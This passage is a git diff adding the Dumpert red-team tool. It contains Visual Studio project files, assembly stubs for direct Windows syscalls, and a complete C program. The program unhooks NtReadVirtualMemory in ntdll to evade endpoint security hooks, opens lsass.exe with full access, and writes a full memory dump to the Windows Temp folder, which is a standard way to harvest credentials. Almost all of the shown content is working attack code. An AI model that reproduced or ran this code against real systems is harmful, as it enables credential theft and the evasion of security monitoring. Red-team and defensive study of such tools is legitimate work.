+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="Dumpert.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="Dumpert.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="Syscalls.asm" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.filters b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.filters
new file mode 100755
index 0000000..68698c6
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.filters
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="Dumpert.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="Dumpert.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="Syscalls.asm">
+      <Filter>Source Files</Filter>
+    </MASM>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.user b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.user
new file mode 100755
index 0000000..a4836ea
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.user
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LocalDebuggerCommand>C:\Windows\System32\Rundll32.exe</LocalDebuggerCommand>
+    <LocalDebuggerCommandArguments>C:\Outflank\Development\Outflank-Dumpert-DLL\x64\Debug\Outflank-Dumpert-DLL.dll,Dump</LocalDebuggerCommandArguments>
+    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
+  </PropertyGroup>
+</Project>
\ No newline at end of file
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Syscalls.asm b/Dumpert-DLL/Outflank-Dumpert-DLL/Syscalls.asm
new file mode 100755
index 0000000..86381b9
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Syscalls.asm
@@ -0,0 +1,237 @@
+.code
+
+; Reference: https://j00ru.vexillium.org/syscalls/nt/64/
+
+; Windows 7 SP1 / Server 2008 R2 specific syscalls
+
+ZwOpenProcess7SP1 proc
+		mov r10, rcx
+		mov eax, 23h
+		syscall
+		ret
+ZwOpenProcess7SP1 endp
+
+ZwClose7SP1 proc
+		mov r10, rcx
+		mov eax, 0Ch
+		syscall
+		ret
+ZwClose7SP1 endp
+
+ZwWriteVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 37h
+		syscall
+		ret
+ZwWriteVirtualMemory7SP1 endp
+
+ZwProtectVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 4Dh
+		syscall
+		ret
+ZwProtectVirtualMemory7SP1 endp
+
+ZwQuerySystemInformation7SP1 proc
+		mov r10, rcx
+		mov eax, 33h
+		syscall
+		ret
+ZwQuerySystemInformation7SP1 endp
+
+NtAllocateVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 15h
+		syscall
+		ret
+NtAllocateVirtualMemory7SP1 endp
+
+NtFreeVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 1Bh
+		syscall
+		ret
+NtFreeVirtualMemory7SP1 endp
+
+NtCreateFile7SP1 proc
+		mov r10, rcx
+		mov eax, 52h
+		syscall
+		ret
+NtCreateFile7SP1 endp
+
+; Windows 8 / Server 2012 specific syscalls
+
+ZwOpenProcess80 proc
+		mov r10, rcx
+		mov eax, 24h
+		syscall
+		ret
+ZwOpenProcess80 endp
+
+ZwClose80 proc
+		mov r10, rcx
+		mov eax, 0Dh
+		syscall
+		ret
+ZwClose80 endp
+
+ZwWriteVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 38h
+		syscall
+		ret
+ZwWriteVirtualMemory80 endp
+
+ZwProtectVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 4Eh
+		syscall
+		ret
+ZwProtectVirtualMemory80 endp
+
+ZwQuerySystemInformation80 proc
+		mov r10, rcx
+		mov eax, 34h
+		syscall
+		ret
+ZwQuerySystemInformation80 endp
+
+NtAllocateVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 16h
+		syscall
+		ret
+NtAllocateVirtualMemory80 endp
+
+NtFreeVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 1Ch
+		syscall
+		ret
+NtFreeVirtualMemory80 endp
+
+NtCreateFile80 proc
+		mov r10, rcx
+		mov eax, 53h
+		syscall
+		ret
+NtCreateFile80 endp
+
+; Windows 8.1 / Server 2012 R2 specific syscalls
+
+ZwOpenProcess81 proc
+		mov r10, rcx
+		mov eax, 25h
+		syscall
+		ret
+ZwOpenProcess81 endp
+
+ZwClose81 proc
+		mov r10, rcx
+		mov eax, 0Eh
+		syscall
+		ret
+ZwClose81 endp
+
+ZwWriteVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 39h
+		syscall
+		ret
+ZwWriteVirtualMemory81 endp
+
+ZwProtectVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 4Fh
+		syscall
+		ret
+ZwProtectVirtualMemory81 endp
+
+ZwQuerySystemInformation81 proc
+		mov r10, rcx
+		mov eax, 35h
+		syscall
+		ret
+ZwQuerySystemInformation81 endp
+
+NtAllocateVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 17h
+		syscall
+		ret
+NtAllocateVirtualMemory81 endp
+
+NtFreeVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 1Dh
+		syscall
+		ret
+NtFreeVirtualMemory81 endp
+
+NtCreateFile81 proc
+		mov r10, rcx
+		mov eax, 54h
+		syscall
+		ret
+NtCreateFile81 endp
+
+; Windows 10 / Server 2016 specific syscalls
+ 
+ZwOpenProcess10 proc
+		mov r10, rcx
+		mov eax, 26h
+		syscall
+		ret
+ZwOpenProcess10 endp
+
+ZwClose10 proc
+		mov r10, rcx
+		mov eax, 0Fh
+		syscall
+		ret
+ZwClose10 endp
+
+ZwWriteVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 3Ah
+		syscall
+		ret
+ZwWriteVirtualMemory10 endp
+
+ZwProtectVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 50h
+		syscall
+		ret
+ZwProtectVirtualMemory10 endp
+
+ZwQuerySystemInformation10 proc
+		mov r10, rcx
+		mov eax, 36h
+		syscall
+		ret
+ZwQuerySystemInformation10 endp
+
+NtAllocateVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 18h
+		syscall
+		ret
+NtAllocateVirtualMemory10 endp
+
+NtFreeVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 1Eh
+		syscall
+		ret
+NtFreeVirtualMemory10 endp
+
+NtCreateFile10 proc
+		mov r10, rcx
+		mov eax, 55h
+		syscall
+		ret
+NtCreateFile10 endp
+
+end
diff --git a/Dumpert/Outflank-Dumpert.sln b/Dumpert/Outflank-Dumpert.sln
new file mode 100755
index 0000000..9f2a4ff
--- /dev/null
+++ b/Dumpert/Outflank-Dumpert.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 14 for Windows Desktop
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert", "Outflank-Dumpert\Outflank-Dumpert.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64
+		{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64
+		{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32
+		{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32
+		{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64
+		{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64
+		{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32
+		{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/Dumpert/Outflank-Dumpert/Dumpert.c b/Dumpert/Outflank-Dumpert/Dumpert.c
new file mode 100755
index 0000000..4539513
--- /dev/null
+++ b/Dumpert/Outflank-Dumpert/Dumpert.c
@@ -0,0 +1,354 @@
+#undef  _UNICODE
+#define _UNICODE
+#undef  UNICODE
+#define UNICODE
+
+#include <Windows.h>
+#include <stdio.h>
+#include "Dumpert.h"
+#include <DbgHelp.h>
+
+#pragma comment (lib, "Dbghelp.lib")
+
+
+BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
+	BYTE AssemblyBytes[] = {0x4C, 0x8B, 0xD1, 0xB8, 0xFF};
+
+	if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
+		AssemblyBytes[4] = pWinVerInfo->SystemCall;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory10;
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
+		AssemblyBytes[4] = pWinVerInfo->SystemCall;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
+		AssemblyBytes[4] = pWinVerInfo->SystemCall;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory80;
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory80;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
+		AssemblyBytes[4] = pWinVerInfo->SystemCall;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory81;
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
+	}
+	else {
+		return FALSE;
+	}
+
+	LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall);
+
+	printf("	[+] %s function pointer at: 0x%p\n", pWinVerInfo->lpApiCall, lpProcAddress);
+	printf("	[+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, AssemblyBytes[4]);
+	printf("	[+] Unhooking %s.\n", pWinVerInfo->lpApiCall);
+
+	ULONG OldProtection, NewProtection;
+	SIZE_T uSize = 10;
+	NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
+	if (status != STATUS_SUCCESS) {
+		wprintf(L"	[!] ZwProtectVirtualMemory failed.\n");
+		return FALSE;
+	}
+	
+	status = ZwWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL);
+	if (status != STATUS_SUCCESS) {
+		wprintf(L"	[!] ZwWriteVirtualMemory failed.\n");
+		return FALSE;
+	}
+
+	status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection);
+	if (status != STATUS_SUCCESS) {
+		wprintf(L"	[!] ZwProtectVirtualMemory failed.\n");
+		return FALSE;
+	}
+
+	return TRUE;
+}
+
+BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) {
+	pWinVerInfo->hTargetPID = NULL;
+
+	if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
+		ZwQuerySystemInformation = &ZwQuerySystemInformation10;
+		NtAllocateVirtualMemory = &NtAllocateVirtualMemory10;
+		NtFreeVirtualMemory = &NtFreeVirtualMemory10;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
+		ZwQuerySystemInformation = &ZwQuerySystemInformation7SP1;
+		NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1;
+		NtFreeVirtualMemory = &NtFreeVirtualMemory7SP1;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
+		ZwQuerySystemInformation = &ZwQuerySystemInformation80;
+		NtAllocateVirtualMemory = &NtAllocateVirtualMemory80;
+		NtFreeVirtualMemory = &NtFreeVirtualMemory80;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
+		ZwQuerySystemInformation = &ZwQuerySystemInformation81;
+		NtAllocateVirtualMemory = &NtAllocateVirtualMemory81;
+		NtFreeVirtualMemory = &NtFreeVirtualMemory81;
+	}
+	else {
+		return FALSE;
+	}
+
+	ULONG uReturnLength = 0;
+	NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength);
+	if (!status == 0xc0000004) {
+		return FALSE;
+	}
+
+	LPVOID pBuffer = NULL;
+	SIZE_T uSize = uReturnLength;
+	status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
+	if (status != 0) {
+		return FALSE;
+	}
+
+	status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength);
+	if (status != 0) {
+		return FALSE;
+	}
+
+	_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
+		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
+	if (RtlEqualUnicodeString == NULL) {
+		return FALSE;
+	}
+
+	PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer;
+	do {
+		if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) {
+			pWinVerInfo->hTargetPID = pProcInfo->ProcessId;
+			break;
+		}
+		pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);
+
+	} while (pProcInfo);
+
+	status = NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);
+
+	if (pWinVerInfo->hTargetPID == NULL) {
+		return FALSE;
+	}
+
+	return TRUE;
+}
+
+BOOL IsElevated() {
+	BOOL fRet = FALSE;
+	HANDLE hToken = NULL;
+	if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
+		TOKEN_ELEVATION Elevation = { 0 };
+		DWORD cbSize = sizeof(TOKEN_ELEVATION);
+		if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
+			fRet = Elevation.TokenIsElevated;
+		}
+	}
+	if (hToken) {
+		CloseHandle(hToken);
+	}
+	return fRet;
+}
+
+BOOL SetDebugPrivilege() {
+	HANDLE hToken = NULL;
+	TOKEN_PRIVILEGES TokenPrivileges = { 0 };
+
+	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
+		return FALSE;
+	}
+
+	TokenPrivileges.PrivilegeCount = 1;
+	TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
+
+	LPWSTR lpwPriv = L"SeDebugPrivilege";
+	if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
+		CloseHandle(hToken);
+		return FALSE;
+	}
+
+	if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
+		CloseHandle(hToken);
+		return FALSE;
+	}
+
+	CloseHandle(hToken);
+	return TRUE;
+}
+
+
+int wmain(int argc, wchar_t* argv[]) {
+	wprintf(L" ________          __    _____.__                 __				\n");
+	wprintf(L" \\_____  \\  __ ___/  |__/ ____\\  | _____    ____ |  | __		\n");
+	wprintf(L"  /   |   \\|  |  \\   __\\   __\\|  | \\__  \\  /    \\|  |/ /	\n");
+	wprintf(L" /    |    \\  |  /|  |  |  |  |  |__/ __ \\|   |  \\    <		\n");
+	wprintf(L" \\_______  /____/ |__|  |__|  |____(____  /___|  /__|_ \\		\n");
+	wprintf(L"         \\/                             \\/     \\/     \\/		\n");
+	wprintf(L"                                  Dumpert							\n");
+	wprintf(L"                               By Cneeliz @Outflank 2019		    \n\n");
+
+	LPCWSTR lpwProcName = L"lsass.exe";
+
+	if (sizeof(LPVOID) != 8) {
+		wprintf(L"[!] Sorry, this tool only works on a x64 version of Windows.\n");
+		exit(1);
+	}
+
+	if (!IsElevated()) {
+		wprintf(L"[!] You need elevated privileges to run this tool!\n");
+		exit(1);
+	}
+
+	SetDebugPrivilege();
+
+	PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO));
+
+	// First set OS Version/Architecture specific values
+	OSVERSIONINFOEXW osInfo;
+	LPWSTR lpOSVersion;
+	osInfo.dwOSVersionInfoSize = sizeof(osInfo);
+
+	_RtlGetVersion RtlGetVersion = (_RtlGetVersion)
+		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
+	if (RtlGetVersion == NULL) {
+		return FALSE;
+	}
+
+	wprintf(L"[1] Checking OS version details:\n");
+	RtlGetVersion(&osInfo);
+	swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion);
+	pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber;
+
+	// Now create os/build specific syscall function pointers.
+	if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
+		lpOSVersion = L"10 or Server 2016";
+		wprintf(L"	[+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
+		wprintf(L"	[+] Mapping version specific System calls.\n");
+		ZwOpenProcess = &ZwOpenProcess10;
+		NtCreateFile = &NtCreateFile10;
+		ZwClose = &ZwClose10;
+		pWinVerInfo->SystemCall = 0x3F;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) {
+		lpOSVersion = L"7 SP1 or Server 2008 R2";
+		wprintf(L"	[+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
+		wprintf(L"	[+] Mapping version specific System calls.\n");
+		ZwOpenProcess = &ZwOpenProcess7SP1;
+		NtCreateFile = &NtCreateFile7SP1;
+		ZwClose = &ZwClose7SP1;
+		pWinVerInfo->SystemCall = 0x3C;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
+		lpOSVersion = L"8 or Server 2012";
+		wprintf(L"	[+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
+		wprintf(L"	[+] Mapping version specific System calls.\n");
+		ZwOpenProcess = &ZwOpenProcess80;
+		NtCreateFile = &NtCreateFile80;
+		ZwClose = &ZwClose80;
+		pWinVerInfo->SystemCall = 0x3D;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
+		lpOSVersion = L"8.1 or Server 2012 R2";
+		wprintf(L"	[+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
+		wprintf(L"	[+] Mapping version specific System calls.\n");
+		ZwOpenProcess = &ZwOpenProcess81;
+		NtCreateFile = &NtCreateFile81;
+		ZwClose = &ZwClose81;
+		pWinVerInfo->SystemCall = 0x3E;
+	}
+	else {
+		wprintf(L"	[!] OS Version not supported.\n\n");
+		exit(1);
+	}
+
+	wprintf(L"[2] Checking Process details:\n");
+
+	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
+		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
+	if (RtlInitUnicodeString == NULL) {
+		return FALSE;
+	}
+
+	RtlInitUnicodeString(&pWinVerInfo->ProcName, lpwProcName);
+
+	if (!GetPID(pWinVerInfo)) {
+		wprintf(L"	[!] Enumerating process failed.\n");
+		exit(1);
+	}
+
+	wprintf(L"	[+] Process ID of %wZ is: %lld\n", pWinVerInfo->ProcName, (ULONG64)pWinVerInfo->hTargetPID);
+	pWinVerInfo->lpApiCall = "NtReadVirtualMemory";
+
+	if (!Unhook_NativeAPI(pWinVerInfo)) {
+		printf("	[!] Unhooking %s failed.\n", pWinVerInfo->lpApiCall);
+		exit(1);
+	}
+
+	wprintf(L"[3] Create memorydump file:\n");
+
+	wprintf(L"	[+] Open a process handle.\n");
+	HANDLE hProcess = NULL;
+	OBJECT_ATTRIBUTES ObjectAttributes;
+	InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
+	CLIENT_ID uPid = { 0 };
+
+	uPid.UniqueProcess = pWinVerInfo->hTargetPID;
+	uPid.UniqueThread = (HANDLE)0;
+
+	NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &uPid);
+	if (hProcess == NULL) {
+		wprintf(L"	[!] Failed to get processhandle.\n");
+		exit(1);
+	}
+
+	WCHAR chDmpFile[MAX_PATH] = L"\\??\\";
+	WCHAR chWinPath[MAX_PATH];
+	GetWindowsDirectory(chWinPath, MAX_PATH);
+	wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), chWinPath);
+	wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), L"\\Temp\\dumpert.dmp");
+
+	UNICODE_STRING uFileName;
+	RtlInitUnicodeString(&uFileName, chDmpFile);
+
+	wprintf(L"	[+] Dump %wZ memory to: %wZ\n", pWinVerInfo->ProcName, uFileName);
+	
+	HANDLE hDmpFile = NULL;
+	IO_STATUS_BLOCK IoStatusBlock;
+	ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock));
+	OBJECT_ATTRIBUTES FileObjectAttributes;
+	InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);
+
+	//  Open input file for writing, overwrite existing file.
+	status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0,
+		FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
+
+	if (hDmpFile == INVALID_HANDLE_VALUE) {
+		wprintf(L"	[!] Failed to create dumpfile.\n");
+		ZwClose(hProcess);
+		exit(1);
+	}
+
+	DWORD dwTargetPID = GetProcessId(hProcess);
+	BOOL Success = MiniDumpWriteDump(hProcess,
+		dwTargetPID,
+		hDmpFile,
+		MiniDumpWithFullMemory,
+		NULL,
+		NULL,
+		NULL);
+	if ((!Success))
+	{
+		wprintf(L"	[!] Failed to create minidump, error code: %x\n", GetLastError());
+	}
+	else {
+		wprintf(L"	[+] Dump succesful.\n");
+	}
+
+	ZwClose(hDmpFile);
+	ZwClose(hProcess);
+
+	return 0;
+}
\ No newline at end of file
diff --git a/Dumpert/Outflank-Dumpert/Dumpert.h b/Dumpert/Outflank-Dumpert/Dumpert.h
new file mode 100755
index 0000000..5034900
